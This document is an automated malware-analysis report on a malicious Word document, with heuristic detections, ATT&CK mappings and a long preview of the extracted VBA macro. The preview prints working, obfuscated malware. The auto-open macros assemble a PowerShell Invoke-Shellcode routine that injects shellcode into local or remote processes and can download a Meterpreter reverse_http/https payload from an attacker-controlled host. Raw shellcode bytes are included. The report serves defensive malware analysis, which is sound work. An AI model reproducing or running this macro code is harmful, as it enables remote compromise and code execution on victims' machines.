MALICIOUS
666
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros that trigger on document open, including Auto_Open, AutoOpen, and Document_Open. These macros reference PowerShell and WMI (Win32_Process.Create) to execute a payload. Heuristics indicate the use of VirtualAlloc and WriteProcessMemory, suggesting the execution of shellcode. The ClamAV detection name 'Doc.Downloader.Pwshell-10001336-0' further supports the analysis of a downloader with PowerShell capabilities.
Heuristics 18
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREADReference to CreateRemoteThread API
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
[Sy" CJikXH = CJikXH + "stem.Runtime.InteropServices.Marshal]::Copy($Shell" CJikXH = CJikXH + "code, 0, $BaseAddress, $Shellcode.Length)" -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
" CJikXH = CJikXH + " if ((!$IsWow64) -and $PowerShell32bit)" " -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() asTf -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() asTf -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Name = "NewMacros" Sub Auto_Open() asTf -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 105536 bytes |
SHA-256: ec6579d22cf12fcc385bdc7a9dd3ccef7177d395ceae1220ef1f9b4daedd31ac |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
asTf
End Sub
Sub AutoOpen()
asTf
End Sub
Sub Document_Open()
asTf
End Sub
Public Function asTf() As Variant
Dim CJikXH As String
CJikXH = "function Invoke-Shellcode"
{
[CmdletBinding( Defa"
CJikXH = CJikXH + "ultParameterSetName = 'RunLocal', SupportsShouldPr"
CJikXH = CJikXH + "ocess = $True , ConfirmImpact = 'High')] Param ("
"
CJikXH = CJikXH + " [ValidateNotNullOrEmpty()]"
[UInt16]
"
CJikXH = CJikXH + "$ProcessID,"
[Parameter( ParameterSetName = 'R"
CJikXH = CJikXH + "unLocal' )]"
[ValidateNotNullOrEmpty()]
["
CJikXH = CJikXH + "Byte[]]"
$Shellcode,
[Parameter( Paramete"
CJikXH = CJikXH + "rSetName = 'Metasploit' )]"
[ValidateSet( 'win"
CJikXH = CJikXH + "dows/meterpreter/reverse_http',"
"
CJikXH = CJikXH + " 'windows/meterpreter/reverse_https',"
"
CJikXH = CJikXH + " IgnoreCase = $True )]"
[String]
$P"
CJikXH = CJikXH + "ayload = 'windows/meterpreter/reverse_http',"
"
CJikXH = CJikXH + "[Parameter( ParameterSetName = 'ListPayloads' )]"
"
CJikXH = CJikXH + " [Switch]"
$ListMetasploitPayloads,
[P"
CJikXH = CJikXH + "arameter( Mandatory = $True,"
Para ""
CJikXH = CJikXH + "meterSetName = 'Metasploit' )]"
[ValidateNotNu"
CJikXH = CJikXH + "llOrEmpty()]"
[String]
$Lhost = '127.0.0."
CJikXH = CJikXH + "1',"
[Parameter( Mandatory = $True,
"
CJikXH = CJikXH + " ParameterSetName = 'Metasploit' )]"
[Va"
CJikXH = CJikXH + "lidateRange( 1,65535 )]"
[Int]
$Lport = 8"
CJikXH = CJikXH + "443,"
[Parameter( ParameterSetName = 'Metasplo"
CJikXH = CJikXH + "it' )]"
[ValidateNotNull()]
[String]
"
CJikXH = CJikXH + " $UserAgent = (Get-ItemProperty -Path 'HKCU:\Softw"
CJikXH = CJikXH + "are\Microsoft\Windows\CurrentVersion\Internet Sett"
CJikXH = CJikXH + "ings').'User Agent',"
[Parameter( ParameterSet"
CJikXH = CJikXH + "Name = 'Metasploit' )]"
[ValidateNotNull()]
"
CJikXH = CJikXH + " [Switch]"
$Legacy = $False,
[Parameter"
CJikXH = CJikXH + "( ParameterSetName = 'Metasploit' )]"
[Validat"
CJikXH = CJikXH + "eNotNull()]"
[Switch]
$Proxy = $False,
"
CJikXH = CJikXH + " [Switch]"
$Force = $False
)
Set-Stric"
CJikXH = CJikXH + "tMode -Version 2.0"
if ($PsCmdlet.ParameterSet"
CJikXH = CJikXH + "Name -eq 'ListPayloads')"
{
$Availabl"
CJikXH = CJikXH + "ePayloads = (Get-Command Invoke-Shellcode).Paramet"
CJikXH = CJikXH + "ers['Payload'].Attributes |"
Where-Obj"
CJikXH = CJikXH + "ect {$_.TypeId -eq [System.Management.Automation.V"
CJikXH = CJikXH + "alidateSetAttribute]}"
foreach ($Payload i"
CJikXH = CJikXH + "n $AvailablePayloads.ValidValues)"
{
"
CJikXH = CJikXH + " New-Object PSObject -Property @{ Payloads "
CJikXH = CJikXH + "= $Payload }"
}
Return
}
"
CJikXH = CJikXH + " if ( $PSBoundParameters['ProcessID'] )"
{
"
CJikXH = CJikXH + " Get-Process -Id $ProcessID -ErrorAction Sto"
CJikXH = CJikXH + "p | Out-Null"
}
function Local:Get-Delega"
CJikXH = CJikXH + "teType"
{
Param
(
"
CJikXH = CJikXH + " [OutputType([Type])]"
[Parameter( P"
CJikXH = CJikXH + "osition = 0)]"
[Type[]]
$"
CJikXH = CJikXH + "Parameters = (New-Object Type[](0)),"
"
CJikXH = CJikXH + "[Parameter( Position = 1 )]"
[Type]
"
CJikXH = CJikXH + " $ReturnType = [Void]"
)
"
CJikXH = CJikXH + " $Domain = [AppDomain]::CurrentDomain"
$D"
CJikXH = CJikXH + "ynAssembly = New-Object System.Reflection.Assembly"
CJikXH = CJikXH + "Name('ReflectedDelegate')"
$AssemblyBuilde"
CJikXH = CJikXH + "r = $Domain.DefineDynamicAssembly($DynAssembly, [S"
CJikXH = CJikXH + "ystem.Reflection.Emit.AssemblyBuilderAccess]::Run)"
CJikXH = CJikXH + ""
$ModuleBuilder = $AssemblyBuilder.Define"
CJikXH = CJikXH + "DynamicModule('InMemoryModule', $false)"
$"
CJikXH = CJikXH + "TypeBuilder = $ModuleBuilder.DefineType('MyDelegat"
CJikXH = CJikXH + "eType', 'Class, Public, Sealed, AnsiClass, AutoCla"
CJikXH = CJikXH + "ss', [System.MulticastDelegate])"
$Constru"
CJikXH = CJikXH + "ctorBuilder = $TypeBuilder.DefineConstructor('RTSp"
CJikXH = CJikXH + "ecialName, HideBySig, Public', [System.Reflection."
CJikXH = CJikXH + "CallingConventions]::Standard, $Parameters)"
"
CJikXH = CJikXH + " $ConstructorBuilder.SetImplementationFlags('Run"
CJikXH = CJikXH + "time, Managed')"
$MethodBuilder = $TypeBui"
CJikXH = CJikXH + "lder.DefineMethod('Invoke', 'Public, HideBySig, Ne"
CJikXH = CJikXH + "wSlot, Virtual', $ReturnType, $Parameters)"
"
CJikXH = CJikXH + " $MethodBuilder.SetImplementationFlags('Runtime, "
CJikXH = CJikXH + "Managed')"
Write-Output $TypeBuilder.Creat"
CJikXH = CJikXH + "eType()"
}
function Local:Get-ProcAddress"
CJikXH = CJikXH + ""
{
Param
(
[Ou"
CJikXH = CJikXH + "tputType([IntPtr])]"
[Parameter( Posit"
CJikXH = CJikXH + "ion = 0, Mandatory = $True )]"
[String"
CJikXH = CJikXH + "]"
$Module,
[Parameter( P"
CJikXH = CJikXH + "osition = 1, Mandatory = $True )]"
[St"
CJikXH = CJikXH + "ring]"
$Procedure
)
"
CJikXH = CJikXH + "$SystemAssembly = [AppDomain]::CurrentDomain.GetAs"
CJikXH = CJikXH + "semblies() |"
Where-Object { $_.Global"
CJikXH = CJikXH + "AssemblyCache -And $_.Location.Split('\\')[-1].Equ"
CJikXH = CJikXH + "als('System.dll') }"
$UnsafeNativeMethods "
CJikXH = CJikXH + "= $SystemAssembly.GetType('Microsoft.Win32.UnsafeN"
CJikXH = CJikXH + "ativeMethods')"
$GetModuleHandle = $Unsafe"
CJikXH = CJikXH + "NativeMethods.GetMethod('GetModuleHandle')"
"
CJikXH = CJikXH + " $GetProcAddress = $UnsafeNativeMethods.GetMethod"
CJikXH = CJikXH + "('GetProcAddress')"
$Kern32Handle = $GetMo"
CJikXH = CJikXH + "duleHandle.Invoke($null, @($Module))"
$tmp"
CJikXH = CJikXH + "Ptr = New-Object IntPtr"
$HandleRef = New-"
CJikXH = CJikXH + "Object System.Runtime.InteropServices.HandleRef($t"
CJikXH = CJikXH + "mpPtr, $Kern32Handle)"
Write-Output $GetPr"
CJikXH = CJikXH + "ocAddress.Invoke($null, @([System.Runtime.InteropS"
CJikXH = CJikXH + "ervices.HandleRef]$HandleRef, $Procedure))"
}
"
CJikXH = CJikXH + ""
function Local:Emit-CallThreadStub ([IntPtr] "
CJikXH = CJikXH + "$BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Archit"
CJikXH = CJikXH + "ecture)"
{
$IntSizePtr = $Architectur"
CJikXH = CJikXH + "e / 8"
function Local:ConvertTo-LittleEndi"
CJikXH = CJikXH + "an ([IntPtr] $Address)"
{
$Li"
CJikXH = CJikXH + "ttleEndianByteArray = New-Object Byte[](0)"
"
CJikXH = CJikXH + " $Address.ToString("X$($IntSizePtr*2)") -spli"
CJikXH = CJikXH + "t '([A-F0-9]{2})' | ForEach-Object { if ($_) { $Li"
CJikXH = CJikXH + "ttleEndianByteArray += [Byte] ('0x{0}' -f $_) } }"
"
CJikXH = CJikXH + ""
[System.Array]::Reverse($LittleEndian"
CJikXH = CJikXH + "ByteArray)"
Write-Output $LittleEndian"
CJikXH = CJikXH + "ByteArray"
}
$CallStub = New-Obje"
CJikXH = CJikXH + "ct Byte[](0)"
if ($IntSizePtr -eq 8)
"
CJikXH = CJikXH + " {"
[Byte[]] $CallStub = 0x48,0xB8 "
CJikXH = CJikXH + " # MOV QWORD RAX, &shellcode"
CJikXH = CJikXH + ""
$CallStub += ConvertTo-LittleEndian "
CJikXH = CJikXH + "$BaseAddr # &shellcode"
$CallStu"
CJikXH = CJikXH + "b += 0xFF,0xD0 # CALL"
CJikXH = CJikXH + " RAX"
$CallStub += 0x6A,0x00 "
CJikXH = CJikXH + " # PUSH BYTE 0"
$"
CJikXH = CJikXH + "CallStub += 0x48,0xB8 "
CJikXH = CJikXH + " # MOV QWORD RAX, &ExitThread"
$Call"
CJikXH = CJikXH + "Stub += ConvertTo-LittleEndian $ExitThreadAddr # &"
CJikXH = CJikXH + "ExitThread"
$CallStub += 0xFF,0xD0 "
CJikXH = CJikXH + " # CALL RAX"
}
"
CJikXH = CJikXH + " else"
{
[Byte[]] $Cal"
CJikXH = CJikXH + "lStub = 0xB8 # MOV DWO"
CJikXH = CJikXH + "RD EAX, &shellcode"
$CallStub += Conve"
CJikXH = CJikXH + "rtTo-LittleEndian $BaseAddr # &shellcode"
"
CJikXH = CJikXH + " $CallStub += 0xFF,0xD0 "
CJikXH = CJikXH + " # CALL EAX"
$CallStub += "
CJikXH = CJikXH + "0x6A,0x00 # PUSH BYT"
CJikXH = CJikXH + "E 0"
$CallStub += 0xB8 "
CJikXH = CJikXH + " # MOV DWORD EAX, &ExitThread"
"
CJikXH = CJikXH + ""
$CallStub += ConvertTo-LittleEndian $"
CJikXH = CJikXH + "ExitThreadAddr # &ExitThread"
$CallStu"
CJikXH = CJikXH + "b += 0xFF,0xD0 # CALL"
CJikXH = CJikXH + " EAX"
}
Write-Output $CallStub
"
CJikXH = CJikXH + " }"
function Local:Inject-RemoteShellcode ("
CJikXH = CJikXH + "[Int] $ProcessID)"
{
$hProcess = $Ope"
CJikXH = CJikXH + "nProcess.Invoke(0x001F0FFF, $false, $ProcessID) # "
CJikXH = CJikXH + "ProcessAccessFlags.All (0x001F0FFF)"
if (!"
CJikXH = CJikXH + "$hProcess)"
{
Throw "Unable t"
CJikXH = CJikXH + "o open a process handle for PID: $ProcessID"
"
CJikXH = CJikXH + " }"
$IsWow64 = $false
if ($64b"
CJikXH = CJikXH + "itCPU) # Only perform theses checks if CPU is 64-b"
CJikXH = CJikXH + "it"
{
$IsWow64Process.Invoke("
CJikXH = CJikXH + "$hProcess, [Ref] $IsWow64) | Out-Null"
"
CJikXH = CJikXH + " if ((!$IsWow64) -and $PowerShell32bit)"
"
CJikXH = CJikXH + " {"
Throw 'Unable to inject 64-b"
CJikXH = CJikXH + "it shellcode from within 32-bit Powershell. Use th"
CJikXH = CJikXH + "e 64-bit version of Powershell if you want this to"
CJikXH = CJikXH + " work.'"
}
elseif ($IsWow"
CJikXH = CJikXH + "64) # 32-bit Wow64 process"
{
"
CJikXH = CJikXH + " if ($Shellcode32.Length -eq 0)"
"
CJikXH = CJikXH + " {"
Throw 'No shellcode "
CJikXH = CJikXH + "was placed in the $Shellcode32 variable!'"
"
CJikXH = CJikXH + " }"
$Shellcode = $Shellcod"
CJikXH = CJikXH + "e32"
}
else # 64-bit proc"
CJikXH = CJikXH + "ess"
{
if ($Shellcode"
CJikXH = CJikXH + "64.Length -eq 0)"
{
"
CJikXH = CJikXH + " Throw 'No shellcode was placed in the $Shel"
CJikXH = CJikXH + "lcode64 variable!'"
}
"
CJikXH = CJikXH + " $Shellcode = $Shellcode64"
}
"
CJikXH = CJikXH + " }"
else # 32-bit CPU
{
"
CJikXH = CJikXH + " if ($Shellcode32.Length -eq 0)"
"
CJikXH = CJikXH + " {"
Throw 'No shellcode was place"
CJikXH = CJikXH + "d in the $Shellcode32 variable!'"
}
"
CJikXH = CJikXH + " $Shellcode = $Shellcode32"
}
"
CJikXH = CJikXH + " $RemoteMemAddr = $VirtualAllocEx.Invoke($hP"
CJikXH = CJikXH + "rocess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3"
CJikXH = CJikXH + "000, 0x40) # (Reserve|Commit, RWX)"
if (!$"
CJikXH = CJikXH + "RemoteMemAddr)"
{
Throw "Unab"
CJikXH = CJikXH + "le to allocate shellcode memory in PID: $ProcessID"
CJikXH = CJikXH + ""
}
$WriteProcessMemory.Invoke($"
CJikXH = CJikXH + "hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.L"
CJikXH = CJikXH + "ength, [Ref] 0) | Out-Null"
$ExitThreadAdd"
CJikXH = CJikXH + "r = Get-ProcAddress kernel32.dll ExitThread"
"
CJikXH = CJikXH + " if ($IsWow64)"
{
$CallStub"
CJikXH = CJikXH + " = Emit-CallThreadStub $RemoteMemAddr $ExitThreadA"
CJikXH = CJikXH + "ddr 32"
}
Else
{
"
CJikXH = CJikXH + " $CallStub = Emit-CallThreadStub $RemoteMemAd"
CJikXH = CJikXH + "dr $ExitThreadAddr 64"
}
$RemoteS"
CJikXH = CJikXH + "tubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPt"
CJikXH = CJikXH + "r]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reser"
CJikXH = CJikXH + "ve|Commit, RWX)"
if (!$RemoteStubAddr)
"
CJikXH = CJikXH + " {"
Throw "Unable to allocate thr"
CJikXH = CJikXH + "ead call stub memory in PID: $ProcessID"
"
CJikXH = CJikXH + "}"
$WriteProcessMemory.Invoke($hProcess, $"
CJikXH = CJikXH + "RemoteStubAddr, $CallStub, $CallStub.Length, [Ref]"
CJikXH = CJikXH + " 0) | Out-Null"
$ThreadHandle = $CreateRem"
CJikXH = CJikXH + "oteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $Re"
CJikXH = CJikXH + "moteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)"
"
CJikXH = CJikXH + " if (!$ThreadHandle)"
{
"
CJikXH = CJikXH + " Throw "Unable to launch remote thread in PID: $P"
CJikXH = CJikXH + "rocessID"
}
$CloseHandle.Invoke("
CJikXH = CJikXH + "$hProcess) | Out-Null"
}
function Local:I"
CJikXH = CJikXH + "nject-LocalShellcode"
{
if ($PowerShe"
CJikXH = CJikXH + "ll32bit) {"
if ($Shellcode32.Length -e"
CJikXH = CJikXH + "q 0)"
{
Throw 'No she"
CJikXH = CJikXH + "llcode was placed in the $Shellcode32 variable!'"
"
CJikXH = CJikXH + " return"
}
"
CJikXH = CJikXH + " $Shellcode = $Shellcode32"
}
els ""
CJikXH = CJikXH + "e"
{
if ($Shellcode64.Length "
CJikXH = CJikXH + "-eq 0)"
{
Throw 'No s"
CJikXH = CJikXH + "hellcode was placed in the $Shellcode64 variable!'"
CJikXH = CJikXH + ""
Return
}
"
CJikXH = CJikXH + " $Shellcode = $Shellcode64"
}
$"
CJikXH = CJikXH + "BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero,"
CJikXH = CJikXH + " $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|C"
CJikXH = CJikXH + "ommit, RWX)"
if (!$BaseAddress)
{"
CJikXH = CJikXH + ""
Throw "Unable to allocate shellcode "
CJikXH = CJikXH + "memory in PID: $ProcessID"
}
[Sy"
CJikXH = CJikXH + "stem.Runtime.InteropServices.Marshal]::Copy($Shell"
CJikXH = CJikXH + "code, 0, $BaseAddress, $Shellcode.Length)"
"
CJikXH = CJikXH + " $ExitThreadAddr = Get-ProcAddress kernel32.dll Ex"
CJikXH = CJikXH + "itThread"
if ($PowerShell32bit)
{"
CJikXH = CJikXH + ""
$CallStub = Emit-CallThreadStub $Bas"
CJikXH = CJikXH + "eAddress $ExitThreadAddr 32"
}
el ""
CJikXH = CJikXH + "se"
{
$CallStub = Emit-CallTh"
CJikXH = CJikXH + "readStub $BaseAddress $ExitThreadAddr 64"
"
CJikXH = CJikXH + "}"
$CallStubAddress = $VirtualAlloc.Invoke"
CJikXH = CJikXH + "([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x4"
CJikXH = CJikXH + "0) # (Reserve|Commit, RWX)"
if (!$CallStub"
CJikXH = CJikXH + "Address)"
{
Throw "Unable to "
CJikXH = CJikXH + "allocate thread call stub."
}
[S"
CJikXH = CJikXH + "ystem.Runtime.InteropServices.Marshal]::Copy($Call"
CJikXH = CJikXH + "Stub, 0, $CallStubAddress, $CallStub.Length)"
"
CJikXH = CJikXH + " $ThreadHandle = $CreateThread.Invoke([IntPtr]:"
CJikXH = CJikXH + ":Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntP"
CJikXH = CJikXH + "tr]::Zero)"
if (!$ThreadHandle)
{"
CJikXH = CJikXH + ""
Throw "Unable to launch thread."
"
CJikXH = CJikXH + " }"
$WaitForSingleObject.Invoke($Thre"
CJikXH = CJikXH + "adHandle, 0xFFFFFFFF) | Out-Null"
$Virtual"
CJikXH = CJikXH + "Free.Invoke($CallStubAddress, $CallStub.Length + 1"
CJikXH = CJikXH + ", 0x8000) | Out-Null # MEM_RELEASE (0x8000)"
"
CJikXH = CJikXH + " $VirtualFree.Invoke($BaseAddress, $Shellcode.Le"
CJikXH = CJikXH + "ngth + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000"
CJikXH = CJikXH + ")"
}
$IsWow64ProcessAddr = Get-ProcAddres"
CJikXH = CJikXH + "s kernel32.dll IsWow64Process"
if ($IsWow64Pro"
CJikXH = CJikXH + "cessAddr)"
{
$IsWow64ProcessDelegate "
CJikXH = CJikXH + "= Get-DelegateType @([IntPtr], [Bool].MakeByRefTyp"
CJikXH = CJikXH + "e()) ([Bool])"
$IsWow64Process = [System.R"
CJikXH = CJikXH + "untime.InteropServices.Marshal]::GetDelegateForFun"
CJikXH = CJikXH + "ctionPointer($IsWow64ProcessAddr, $IsWow64ProcessD"
CJikXH = CJikXH + "elegate)"
$64bitCPU = $true
}
el ""
CJikXH = CJikXH + "se"
{
$64bitCPU = $false
}
"
CJikXH = CJikXH + "if ([IntPtr]::Size -eq 4)"
{
$PowerSh"
CJikXH = CJikXH + "ell32bit = $true"
}
Else
{
"
CJikXH = CJikXH + "$PowerShell32bit = $false"
}
if ($PsCmdle"
CJikXH = CJikXH + "t.ParameterSetName -eq 'Metasploit')"
{
"
CJikXH = CJikXH + " if (!$PowerShell32bit) {"
$RootInvo"
CJikXH = CJikXH + "cation = $MyInvocation.Line"
$Response"
CJikXH = CJikXH + " = $True"
if ( $Force -or ( $Response "
CJikXH = CJikXH + "= $psCmdlet.ShouldContinue( "Do you want to launch"
CJikXH = CJikXH + " the payload from x86 Powershell?",
"
CJikXH = CJikXH + " "Attempt to execute 32-bit shellcode from 64"
CJikXH = CJikXH + "-bit Powershell. Note: This process takes about on"
CJikXH = CJikXH + "e minute. Be patient! You will also see some artif"
CJikXH = CJikXH + "acts of the script loading in the other process." "
CJikXH = CJikXH + ") ) ) { }"
if ( !$Response )
"
CJikXH = CJikXH + " {"
Return
}
"
CJikXH = CJikXH + " if ($MyInvocation.BoundParameters['Force']"
CJikXH = CJikXH + ")"
{
$Command = "func"
CJikXH = CJikXH + "tion $($MyInvocation.InvocationName) {`n" + $MyInv"
CJikXH = CJikXH + "ocation.MyCommand.ScriptBlock + "`n}`n$($RootInvoc"
CJikXH = CJikXH + "ation)`n`n"
}
Else
"
CJikXH = CJikXH + " {"
$Command = "function $("
CJikXH = CJikXH + "$MyInvocation.InvocationName) {`n" + $MyInvocation"
CJikXH = CJikXH + ".MyCommand.ScriptBlock + "`n}`n$($RootInvocation) "
CJikXH = CJikXH + "-Force`n`n"
}
$CommandBy"
CJikXH = CJikXH + "tes = [System.Text.Encoding]::Ascii.GetBytes($Comm"
CJikXH = CJikXH + "and)"
$EncodedCommand = [Convert]::ToB"
CJikXH = CJikXH + "ase64String($CommandBytes)"
$Execute ="
CJikXH = CJikXH + " '$Command' + " | $Env:windir\SysWOW64\WindowsPowe"
CJikXH = CJikXH + "rShell\v1.0\powershell.exe -NoProfile -Command -"
"
CJikXH = CJikXH + ""
Invoke-Expression -Command $Execute |"
CJikXH = CJikXH + " Out-Null"
Return
}
"
CJikXH = CJikXH + "$Response = $True"
if ( $Force -or ( $Resp"
CJikXH = CJikXH + "onse = $psCmdlet.ShouldContinue( "Do you know what"
CJikXH = CJikXH + " you're doing?",
"About to downloa"
CJikXH = CJikXH + "d Metasploit payload '$($Payload)' LHOST=$($Lhost)"
CJikXH = CJikXH + ", LPORT=$($Lport)" ) ) ) { }
if ( !$Respo"
CJikXH = CJikXH + "nse )"
{
Return
}
"
CJikXH = CJikXH + " switch ($Payload)"
{
'"
CJikXH = CJikXH + "windows/meterpreter/reverse_http'"
{
"
CJikXH = CJikXH + " $SSL = ''"
}
"
CJikXH = CJikXH + " 'windows/meterpreter/reverse_https'"
"
CJikXH = CJikXH + " {"
$SSL = 's'
"
CJikXH = CJikXH + "[System.Net.ServicePointManager]::ServerCertificat"
CJikXH = CJikXH + "eValidationCallback = {$True}"
}
"
CJikXH = CJikXH + " }"
if ($Legacy)
{
"
CJikXH = CJikXH + " $Request = "http$($SSL)://$($Lhost):$($Lport)/I"
CJikXH = CJikXH + "NITM"
} else {
$CharArray = "
CJikXH = CJikXH + "48..57 + 65..90 + 97..122 | ForEach-Object {[Char]"
CJikXH = CJikXH + "$_}"
$SumTest = $False
wh ""
CJikXH = CJikXH + "ile ($SumTest -eq $False) "
{
"
CJikXH = CJikXH + " $GeneratedUri = $CharArray | Get-Random -"
CJikXH = CJikXH + "Count 4"
$SumTest = (([int[]] $Gen"
CJikXH = CJikXH + "eratedUri | Measure-Object -Sum).Sum % 0x100 -eq 9"
CJikXH = CJikXH + "2)"
}
$RequestUri = -join"
CJikXH = CJikXH + " $GeneratedUri"
$Request = "http$($SSL"
CJikXH = CJikXH + ")://$($Lhost):$($Lport)/$($RequestUri)"
"
CJikXH = CJikXH + "}"
$Uri = New-Object Uri($Request)
"
CJikXH = CJikXH + " $WebClient = New-Object System.Net.WebClient"
"
CJikXH = CJikXH + " $WebClient.Headers.Add('user-agent', "$UserA"
CJikXH = CJikXH + "gent")
if ($Proxy)
{
"
CJikXH = CJikXH + " $WebProxyObject = New-Object System.Net.WebProxy"
CJikXH = CJikXH + ""
$ProxyAddress = (Get-ItemProperty -P"
CJikXH = CJikXH + "ath 'HKCU:\Software\Microsoft\Windows\CurrentVersi"
CJikXH = CJikXH + "on\Internet Settings').ProxyServer"
if"
CJikXH = CJikXH + " ($ProxyAddress) "
{
"
CJikXH = CJikXH + "$WebProxyObject.Address = $ProxyAddress"
"
CJikXH = CJikXH + " $WebProxyObject.UseDefaultCredentials = $Tr"
CJikXH = CJikXH + "ue"
$WebClientObject.Proxy = $WebP"
CJikXH = CJikXH + "roxyObject"
}
}
try
"
CJikXH = CJikXH + ""
{
[Byte[]] $Shellcode32 = $W"
CJikXH = CJikXH + "ebClient.DownloadData($Uri)"
}
ca ""
CJikXH = CJikXH + "tch"
{
Throw "$($Error[0].Exc"
CJikXH = CJikXH + "eption.InnerException.InnerException.Message)"
"
CJikXH = CJikXH + " }"
[Byte[]] $Shellcode64 = $Shellcod"
CJikXH = CJikXH + "e32"
}
elseif ($PSBoundParameters['Shellc"
CJikXH = CJikXH + "ode'])"
{
[Byte[]] $Shellcode32 = $Sh"
CJikXH = CJikXH + "ellcode"
[Byte[]] $Shellcode64 = $Shellcod"
CJikXH = CJikXH + "e32"
}
Else
{
[Byte[]] $She"
CJikXH = CJikXH + "llcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x"
CJikXH = CJikXH + "89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,"
"
CJikXH = CJikXH + " 0x52,0x0c,0x8b,0x52,0"
CJikXH = CJikXH + "x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0"
CJikXH = CJikXH + "x31,0xc0,"
0 xac , ""
CJikXH = CJikXH + "0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,"
CJikXH = CJikXH + "0xc7,0xe2,0xf0,0x52,0x57,"
"
CJikXH = CJikXH + " 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0"
CJikXH = CJikXH + ",0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,"
"
CJikXH = CJikXH + " 0xd0,0x50,0x8b,0x48,0x1"
CJikXH = CJikXH + "8,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x3"
CJikXH = CJikXH + "4,0x8b,"
0x01,0x"
CJikXH = CJikXH + "d6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0x"
CJikXH = CJikXH + "c7,0x38,0xe0,0x75,0xf4,"
"
CJikXH = CJikXH + " 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0"
CJikXH = CJikXH + "x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,"
"
CJikXH = CJikXH + " 0x0c,0x4b,0x8b,0x58,0x1c,"
CJikXH = CJikXH + "0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,"
CJikXH = CJikXH + "0x24,"
0x5b,0x5b"
CJikXH = CJikXH + ",0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b"
CJikXH = CJikXH + ",0x12,0xeb,0x86,0x5d,"
"
CJikXH = CJikXH + " 0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x5"
CJikXH = CJikXH + "0,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,"
"
